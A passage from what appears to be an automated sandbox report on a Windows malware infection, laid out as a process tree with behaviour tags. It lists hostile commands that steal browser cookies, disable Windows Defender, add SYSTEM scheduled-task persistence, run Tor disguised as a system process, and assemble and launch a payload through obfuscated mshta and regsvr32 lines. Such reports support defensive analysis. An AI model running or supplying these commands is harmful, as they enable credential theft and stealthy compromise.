                                                                                          PID:2848
                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                          timeout /t 6
                                                                                          8⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:6016
                                                                                    • C:\Users\Admin\Documents\obE9BwwCojhUj97gY7PRfpeE.exe
                                                                                      "C:\Users\Admin\Documents\obE9BwwCojhUj97gY7PRfpeE.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4908
                                                                                      • C:\Users\Admin\Documents\obE9BwwCojhUj97gY7PRfpeE.exe
                                                                                        "{path}"
                                                                                        7⤵
                                                                                          PID:4616
                                                                                        • C:\Users\Admin\Documents\obE9BwwCojhUj97gY7PRfpeE.exe
                                                                                          "{path}"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4456
                                                                                      • C:\Users\Admin\Documents\rEwdx5FOhoVcyVaA3Qi9cZaV.exe
                                                                                        "C:\Users\Admin\Documents\rEwdx5FOhoVcyVaA3Qi9cZaV.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4288
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-KF848.tmp\rEwdx5FOhoVcyVaA3Qi9cZaV.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-KF848.tmp\rEwdx5FOhoVcyVaA3Qi9cZaV.tmp" /SL5="$10296,138429,56832,C:\Users\Admin\Documents\rEwdx5FOhoVcyVaA3Qi9cZaV.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          PID:5020
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-JG64M.tmp\Setup.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-JG64M.tmp\Setup.exe" /Verysilent
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:4664
                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                              9⤵
                                                                                                PID:2848
                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                  10⤵
                                                                                                    PID:5248
                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                  9⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4532
                                                                                                  • C:\Users\Admin\AppData\Roaming\8247821.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\8247821.exe"
                                                                                                    10⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5532
                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                      C:\Windows\system32\WerFault.exe -u -p 5532 -s 1956
                                                                                                      11⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Program crash
                                                                                                      PID:4160
                                                                                                  • C:\Users\Admin\AppData\Roaming\5264644.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\5264644.exe"
                                                                                                    10⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    PID:5568
                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                      11⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5980
                                                                                                  • C:\Users\Admin\AppData\Roaming\4374392.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\4374392.exe"
                                                                                                    10⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5628
                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                  9⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2328
                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBox8876.exe
                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBox8876.exe" /Silent
                                                                                                  9⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Drops file in Program Files directory
                                                                                                  PID:4348
                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
                                                                                                  9⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Checks processor information in registry
                                                                                                  PID:4868
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im GameBox64bit.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe" & del C:\ProgramData\*.dll & exit
                                                                                                    10⤵
                                                                                                      PID:500
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /im GameBox64bit.exe /f
                                                                                                        11⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:5852
                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                        timeout /t 6
                                                                                                        11⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:5804
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                                    9⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4212
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      10⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5624
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      10⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5884
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      10⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5252
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      10⤵
                                                                                                        PID:4712
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                            4⤵
                                                                                              PID:1392
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                              4⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4076
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_6.exe
                                                                                                sonia_6.exe
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Adds Run key to start application
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3816
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4180
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:5068
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  6⤵
                                                                                                    PID:5140
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    6⤵
                                                                                                      PID:2468
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 360 -s 532
                                                                                                  4⤵
                                                                                                  • Program crash
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2072
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                                                  4⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4008
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                            1⤵
                                                                                              PID:1924
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                              1⤵
                                                                                                PID:1380
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                1⤵
                                                                                                  PID:1368
                                                                                                • c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                  1⤵
                                                                                                    PID:1164
                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                    1⤵
                                                                                                      PID:1112
                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                      1⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      PID:344
                                                                                                      • C:\Users\Admin\AppData\Roaming\cjwbbgf
                                                                                                        C:\Users\Admin\AppData\Roaming\cjwbbgf
                                                                                                        2⤵
                                                                                                        • Loads dropped DLL
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:6080
                                                                                                      • C:\Users\Admin\AppData\Roaming\btwbbgf
                                                                                                        C:\Users\Admin\AppData\Roaming\btwbbgf
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:4616
                                                                                                        • C:\Users\Admin\AppData\Roaming\btwbbgf
                                                                                                          C:\Users\Admin\AppData\Roaming\btwbbgf
                                                                                                          3⤵
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:3152
                                                                                                      • \??\c:\windows\system\svchost.exe
                                                                                                        c:\windows\system\svchost.exe
                                                                                                        2⤵
                                                                                                          PID:4672
                                                                                                        • C:\Users\Admin\AppData\Roaming\cjwbbgf
                                                                                                          C:\Users\Admin\AppData\Roaming\cjwbbgf
                                                                                                          2⤵
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:5468
                                                                                                        • C:\Users\Admin\AppData\Roaming\btwbbgf
                                                                                                          C:\Users\Admin\AppData\Roaming\btwbbgf
                                                                                                          2⤵
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:5008
                                                                                                          • C:\Users\Admin\AppData\Roaming\btwbbgf
                                                                                                            C:\Users\Admin\AppData\Roaming\btwbbgf
                                                                                                            3⤵
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:4348
                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                          C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\KGCToQuEL\KGCToQuEL.dll",KGCToQuEL
                                                                                                          2⤵
                                                                                                          • Windows security modification
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:5880
                                                                                                        • C:\Users\Admin\AppData\Roaming\uswbbgf
                                                                                                          C:\Users\Admin\AppData\Roaming\uswbbgf
                                                                                                          2⤵
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:4060
                                                                                                        • \??\c:\windows\system\svchost.exe
                                                                                                          c:\windows\system\svchost.exe
                                                                                                          2⤵
                                                                                                            PID:388
                                                                                                          • C:\Users\Admin\AppData\Roaming\cjwbbgf
                                                                                                            C:\Users\Admin\AppData\Roaming\cjwbbgf
                                                                                                            2⤵
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:3108
                                                                                                          • C:\Users\Admin\AppData\Roaming\btwbbgf
                                                                                                            C:\Users\Admin\AppData\Roaming\btwbbgf
                                                                                                            2⤵
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:2848
                                                                                                            • C:\Users\Admin\AppData\Roaming\btwbbgf
                                                                                                              C:\Users\Admin\AppData\Roaming\btwbbgf
                                                                                                              3⤵
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:2752
                                                                                                          • C:\Users\Admin\AppData\Roaming\uswbbgf
                                                                                                            C:\Users\Admin\AppData\Roaming\uswbbgf
                                                                                                            2⤵
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:6088
                                                                                                          • \??\c:\windows\system\svchost.exe
                                                                                                            c:\windows\system\svchost.exe
                                                                                                            2⤵
                                                                                                              PID:3908
                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                            1⤵
                                                                                                              PID:996
                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                              1⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:3280
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                2⤵
                                                                                                                • Checks processor information in registry
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Modifies registry class
                                                                                                                PID:4396
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                2⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Checks processor information in registry
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Modifies registry class
                                                                                                                PID:736
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_1.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_1.exe" -a
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4108
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_3.exe
                                                                                                              sonia_3.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Modifies system certificate store
                                                                                                              PID:496
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 1440
                                                                                                                2⤵
                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                • Program crash
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:5012
                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                              1⤵
                                                                                                              • Process spawned unexpected child process
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:4248
                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                2⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4280
                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                              1⤵
                                                                                                              • Process spawned unexpected child process
                                                                                                              PID:5884
                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                2⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Modifies registry class
                                                                                                                PID:5924
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                              1⤵
                                                                                                              • Loads dropped DLL
                                                                                                              • Modifies registry class
                                                                                                              PID:5968
                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                              1⤵
                                                                                                              • Process spawned unexpected child process
                                                                                                              PID:5944
                                                                                                            • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                              C:\Windows\servicing\TrustedInstaller.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4712
                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                              1⤵
                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                              PID:1816
                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
                                                                                                              1⤵
                                                                                                                PID:5324
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\AC49.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\AC49.exe
                                                                                                                1⤵
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:4792
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\39B5.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\39B5.exe
                                                                                                                1⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:5716
                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                1⤵
                                                                                                                  PID:5656
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                  1⤵
                                                                                                                    PID:1360
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\A571.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\A571.exe
                                                                                                                    1⤵
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:4952
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\42C.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\42C.exe
                                                                                                                    1⤵
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:5528
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\12B3.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\12B3.exe
                                                                                                                    1⤵
                                                                                                                      PID:4284
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\213B.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\213B.exe
                                                                                                                      1⤵
                                                                                                                        PID:5228
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\773D.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\773D.exe
                                                                                                                        1⤵
                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                        PID:5716
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9015.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\9015.exe
                                                                                                                        1⤵
                                                                                                                        • Drops file in Windows directory
                                                                                                                        PID:5668
                                                                                                                        • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                          2⤵
                                                                                                                            PID:4656
                                                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                            schtasks /create /sc minute /ED "12/12/2022" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                            2⤵
                                                                                                                            • Creates scheduled task(s)
                                                                                                                            PID:4468
                                                                                                                          • C:\Windows\System\svchost.exe
                                                                                                                            "C:\Windows\System\svchost.exe" formal
                                                                                                                            2⤵
                                                                                                                            • Drops file in Windows directory
                                                                                                                            PID:5452
                                                                                                                            • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                              "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                              3⤵
                                                                                                                                PID:804
                                                                                                                              • C:\Windows\System\spoolsv.exe
                                                                                                                                "C:\Windows\System\spoolsv.exe" --MaxCircuitDirtiness 60 --NewCircuitPeriod 1 --MaxClientCircuitsPending 1024 --OptimisticData 1 --KeepalivePeriod 30 --CircuitBuildTimeout 10 --EnforceDistinctSubnets 0 --HardwareAccel 1 --UseEntryGuards 0
                                                                                                                                3⤵
                                                                                                                                  PID:5292
                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:1032
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:5632
                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:4112
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:4412
                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:5024
                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:5372
                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:2228
                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:3400
                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:5548
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DC52.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\DC52.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:5152
                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                    "C:\Windows\System32\mshta.exe" vbSCRIPt: cLOSE ( cREATeoBJECt ("WSCRiPt.SHELl" ). RUn ( "CmD /C tyPE ""C:\Users\Admin\AppData\Local\Temp\DC52.exe"" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF """" == """" for %u in (""C:\Users\Admin\AppData\Local\Temp\DC52.exe"" ) do taskkill /IM ""%~nxu"" -F " ,0 ,trUe ) )
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4348
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C tyPE "C:\Users\Admin\AppData\Local\Temp\DC52.exe" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF "" == "" for %u in ("C:\Users\Admin\AppData\Local\Temp\DC52.exe" ) do taskkill /IM "%~nxu" -F
                                                                                                                                                        3⤵
                                                                                                                                                          PID:484
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE
                                                                                                                                                            ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2836
                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                "C:\Windows\System32\mshta.exe" vbSCRIPt: cLOSE ( cREATeoBJECt ("WSCRiPt.SHELl" ). RUn ( "CmD /C tyPE ""C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE"" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF ""/P_Y8a5JuWcFqIugTe3zu0e0JtIZJ "" == """" for %u in (""C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE"" ) do taskkill /IM ""%~nxu"" -F " ,0 ,trUe ) )
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:5076
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C tyPE "C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF "/P_Y8a5JuWcFqIugTe3zu0e0JtIZJ " == "" for %u in ("C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE" ) do taskkill /IM "%~nxu" -F
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:5256
                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbScriPt: CLosE ( CReATEoBJECT ( "WScRiPT.shelL" ). RUN ( "C:\Windows\system32\cmd.exe /q /c echo raH5C%RANdOm%S5SL8> EB_HYL.2J & EchO | SEt /P = ""MZ"" > c2Y3YxsZ.M9Z & coPy /B /y C2Y3YxsZ.m9Z + yWVx3x_.3UY + 6_P_Y4.PCT + dO~RV5TB.TuG + CAKMOv5L.OJ + ZOWCN.08 + G~EBG.A + EB_HyL.2J ..\BKZz.P & StArt regsvr32 ..\BkZz.p /u -S & Del /Q * " , 0 , tRUE ) )
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:1692
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /q /c echo raH5C%RANdOm%S5SL8> EB_HYL.2J & EchO | SEt /P = "MZ" >c2Y3YxsZ.M9Z & coPy /B /y C2Y3YxsZ.m9Z + yWVx3x_.3UY + 6_P_Y4.PCT + dO~RV5TB.TuG + CAKMOv5L.OJ + ZOWCN.08 + G~EBG.A +EB_HyL.2J ..\BKZz.P & StArt regsvr32 ..\BkZz.p /u -S & Del /Q *
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:5680
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" EchO "
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:5780
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>c2Y3YxsZ.M9Z"
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:4740
                                                                                                                                                                              • C:\Windows\SysWOW64\regsvr32.exe
